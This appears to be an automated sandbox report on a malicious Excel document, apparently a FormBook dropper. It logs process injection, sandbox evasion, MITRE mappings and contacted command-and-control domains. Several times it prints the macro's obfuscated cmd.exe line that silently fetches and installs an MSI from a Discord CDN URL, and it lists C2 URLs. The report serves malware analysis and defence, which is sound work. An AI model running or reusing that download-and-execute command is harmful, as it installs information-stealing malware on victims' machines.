          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'
          Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wininit.pdb source: MSID8B1.tmp, 00000007.00000003.2147755225.0000000000520000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSID8B1.tmp, wininit.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Windows\Installer\MSID8B1.tmpUnpacked PE file: 7.2.MSID8B1.tmp.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
          Source: 0d69e4f6_by_Libranalysis.xlsStream path '_VBA_PROJECT_CUR/VBA/AK2_oiMjTt8L' : High number of string operations
          Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module AK2_oiMjTt8L
          Obfuscated command line foundShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00096608 push esp; iretd
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_000998E6 pushad ; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00097AA0 push 00FCAB15h; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009CEFB push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009CF5C push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00096FE8 push ss; retf
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024EE3E6 pushad ; ret
          Source: C:\Windows\Installer\MSID8B1.tmpFile created: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE7
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wininit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Installer\MSID8B1.tmpRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Installer\MSID8B1.tmpRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00940101 rdtsc
          Source: C:\Windows\System32\msiexec.exe TID: 2944Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\msiexec.exe TID: 2944Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2336Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\wininit.exe TID: 2264Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000008.00000002.2343968360.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2111770353.000000000842E000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2106036941.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2111770353.000000000842E000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: MSID8B1.tmp, 00000006.00000002.2096256432.0000000000534000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000008.00000002.2344004696.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information queried: ProcessInformation
          Source: C:\Windows\Installer\MSID8B1.tmpProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wininit.exeProcess queried: DebugPort
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00940101 rdtsc
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 6_2_10001000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 6_2_005015DB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 6_2_005017F3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009026F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022026F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Installer\MSID8B1.tmpProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wininit.exeProcess token adjusted: Debug
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 6_2_1000144A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.duoteshop.com
          Source: C:\Windows\explorer.exeDomain query: www.destek-taleplerimiz.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exeDomain query: www.adimadimingilizce.com
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80
          DLL side loading technique detectedShow sources
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\Installer\MSID8B1.tmp protection: execute and read and write
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Installer\MSID8B1.tmpThread register set: target process: 1388
          Source: C:\Windows\Installer\MSID8B1.tmpThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\wininit.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Installer\MSID8B1.tmpThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Installer\MSID8B1.tmpSection unmapped: C:\Windows\SysWOW64\wininit.exe base address: 1D0000
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'
          Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.2343968360.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter1DLL Side-Loading1Process Injection512Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting22Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution13Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information13Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 402839 Sample: 0d69e4f6_by_Libranalysis Startdate: 03/05/2021 Architecture: WINDOWS Score: 100 32 www.111bjs.com 2->32 34 111bjs.com 2->34 36 cdn.discordapp.com 2->36 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 10 other signatures 2->50 9 MSID8B1.tmp 19 2->9         started        13 EXCEL.EXE 10 8 2->13         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\Temp\...\5rov.dll, PE32 9->30 dropped 60 Detected unpacking (changes PE section rights) 9->60 62 Maps a DLL or memory area into another process 9->62 64 DLL side loading technique detected 9->64 66 Tries to detect virtualization through RDTSC time measurements 9->66 15 MSID8B1.tmp 9->15         started        68 Obfuscated command line found 13->68 18 cmd.exe 13->18         started        signatures6 process7 signatures8 70 Modifies the context of a thread in another process (thread injection) 15->70 72 Maps a DLL or memory area into another process 15->72 74 Sample uses process hollowing technique 15->74 76 Queues an APC in another process (thread injection) 15->76 20 wininit.exe 15->20         started        23 explorer.exe 15->23 injected 26 msiexec.exe 18->26         started        process9 dnsIp10 52 Modifies the context of a thread in another process (thread injection) 20->52 54 Maps a DLL or memory area into another process 20->54 56 Tries to detect virtualization through RDTSC time measurements 20->56 28 cmd.exe 20->28         started        38 adimadimingilizce.com 192.0.78.25, 49166, 80 AUTOMATTICUS United States 23->38 40 www.destek-taleplerimiz.com 99.83.154.118, 49167, 80 AMAZON-02US United States 23->40 42 2 other IPs or domains 23->42 58 System process connects to network (likely due to code injection or exploit) 23->58 signatures11 process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0d69e4f6_by_Libranalysis.xls38%ReversingLabsDocument-Word.Trojan.Valyria
          0d69e4f6_by_Libranalysis.xls100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.MSID8B1.tmp.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.MSID8B1.tmp.710000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.1.MSID8B1.tmp.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.MSID8B1.tmp.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          6.0.MSID8B1.tmp.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          7.0.MSID8B1.tmp.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          www.111bjs.com/ccr/100%Avira URL Cloudmalware
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn0%Avira URL Cloudsafe
          http://www.destek-taleplerimiz.com/ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          adimadimingilizce.com
          192.0.78.25
          truetrue
            unknown
            cdn.discordapp.com
            162.159.129.233
            truefalse
              high
              www.destek-taleplerimiz.com
              99.83.154.118
              truetrue
                unknown
                111bjs.com
                34.102.136.180
                truetrue
                  unknown
                  www.adimadimingilizce.com
                  unknown
                  unknowntrue
                    unknown
                    www.duoteshop.com
                    unknown
                    unknowntrue
                      unknown
                      www.111bjs.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        www.111bjs.com/ccr/true
                        • Avira URL Cloud: malware
                        low
                        http://www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOntrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.destek-taleplerimiz.com/ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOntrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                          high
                          http://investor.msn.comexplorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmpfalse
                                high
                                http://wellformedweb.org/CommentAPI/msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmpfalse
                                  high
                                  https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msimsiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmpfalse
                                    high
                                    https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnmsiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmpfalse
                                      high
                                      http://investor.msn.com/explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.iis.fhg.de/audioPAmsiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmpfalse
                                          high
                                          http://computername/printers/printername/.printermsiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.%s.comPAMSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          http://www.hotmail.com/oeexplorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                                            high
                                            http://treyresearch.netmsiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://servername/isapibackend.dllexplorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
